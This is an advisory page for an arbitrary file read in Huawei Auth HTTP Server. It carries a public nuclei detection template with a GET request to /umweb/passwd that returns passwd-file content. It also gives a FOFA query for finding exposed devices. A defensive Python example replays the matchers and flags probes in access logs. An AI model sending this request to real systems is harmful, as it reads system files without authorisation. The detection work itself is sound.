huawei-authhttp-lfi: Huawei Auth Http Server - Arbitrary File Read

Date: 2025-08-01 | Affected software: Huawei Auth Http Server | PoC: public

Vulnerability description

Huawei Auth HTTP Server is vulnerable to Arbitrary File Read.

PoC code [public]

id: huawei-authhttp-lfi

info:
  name: Huawei Auth Http Server - Arbitrary File Read
  author: DhiyaneshDk
  severity: high
  description: Huawei Auth HTTP Server is vulnerable to Arbitrary File Read.
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498499&idx=1&sn=6850c3e9a3df795e48ba9a10c9772ddd
    - https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/huawei-auth-http-readfile.py
  metadata:
    verified: true
    max-request: 1
    fofa-query: server="Huawei Auth-Http Server 1.0"
  tags: lfi,huawei,authhttp,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/umweb/passwd"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Huawei Auth-Http Server"

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e95f76f058661dec562c08ec30cf9f166dd1bb191e2faa883da73b8c1d2d241c0220226357ad9f1c1c7e389349386a483920dd277d3f8cf3b7ff841de05543b5c271:922c64590222798bb761d5b6d8e72950
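The template above only fires when all three matchers agree (matchers-condition: and): the response header block contains the "Huawei Auth-Http Server" banner, the body matches the passwd-style regex "root:.*:0:0:", and the status is 200. The following added example, which is not part of the nuclei template or the referenced PoC, reimplements that evaluation in Python so a defender can replay it against captured responses (for instance to confirm a fix now returns 403 or 404), and adds a small scanner that flags probes of the /umweb/passwd path in access logs. All responses and log lines are constructed sample data; the function and class names are this example's own.

```python
"""Added example: replays the template's matcher logic and scans access logs.

Not part of the nuclei template; sample responses and log lines are constructed.
"""
import re
from dataclasses import dataclass, field

# Values taken from the template above.
PROBE_PATH = "/umweb/passwd"
SERVER_BANNER = "Huawei Auth-Http Server"
PASSWD_RE = re.compile(r"root:.*:0:0:")


@dataclass
class HttpResponse:
    """Minimal captured HTTP response (hypothetical structure for this example)."""
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""


def evaluate_matchers(resp: HttpResponse) -> dict:
    """Evaluate the three template matchers; 'all' mirrors matchers-condition: and.

    The nuclei word matcher with part: header searches the raw header block
    (names and values), so the header is rebuilt as "Name: value" lines here.
    """
    header_block = "\n".join(f"{k}: {v}" for k, v in resp.headers.items())
    result = {
        "header": SERVER_BANNER in header_block,
        "body": PASSWD_RE.search(resp.body) is not None,
        "status": resp.status == 200,
    }
    result["all"] = all(result.values())
    return result


# Combined log format: client, ident, user, [time], "METHOD path PROTO", status, bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def find_probes(log_text: str) -> list:
    """Return (client_ip, status) for every request whose path is the probe path.

    A 200 with a sizeable body is the signal to triage; a 403/404 shows the
    endpoint is blocked but still records who is looking for it.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, _method, path, status, _size = m.groups()
        if path.split("?", 1)[0] == PROBE_PATH:
            hits.append((ip, int(status)))
    return hits


# Constructed sample responses (not real captures).
VULNERABLE = HttpResponse(
    status=200,
    headers={"Server": "Huawei Auth-Http Server 1.0", "Content-Type": "text/plain"},
    body="root:x:0:0:root:/root:/bin/bash\nnobody:x:65534:65534::/:/sbin/nologin\n",
)
PATCHED = HttpResponse(
    status=403,
    headers={"Server": "Huawei Auth-Http Server 1.0"},
    body="Forbidden",
)
# Same leaked content from a different product: banner matcher must reject it.
OTHER_SERVER = HttpResponse(
    status=200,
    headers={"Server": "nginx"},
    body="root:x:0:0:root:/root:/bin/bash\n",
)

# Constructed access-log excerpt.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2025:10:00:01 +0000] "GET /umweb/passwd HTTP/1.1" 200 1280 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Aug/2025:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Aug/2025:10:00:03 +0000] "GET /umweb/passwd?x=1 HTTP/1.1" 403 21 "-" "curl/8.0"
"""

if __name__ == "__main__":
    for name, resp in (("vulnerable", VULNERABLE), ("patched", PATCHED), ("other", OTHER_SERVER)):
        print(name, evaluate_matchers(resp))
    print("probes:", find_probes(SAMPLE_LOG))
```

The per-matcher dictionary is deliberately kept alongside the combined verdict: after a fix is deployed, seeing header=True, status=False, body=False confirms the device is still the same product but no longer serves the file, whereas a run that shows all three as False usually means the probe hit a different host or a proxy.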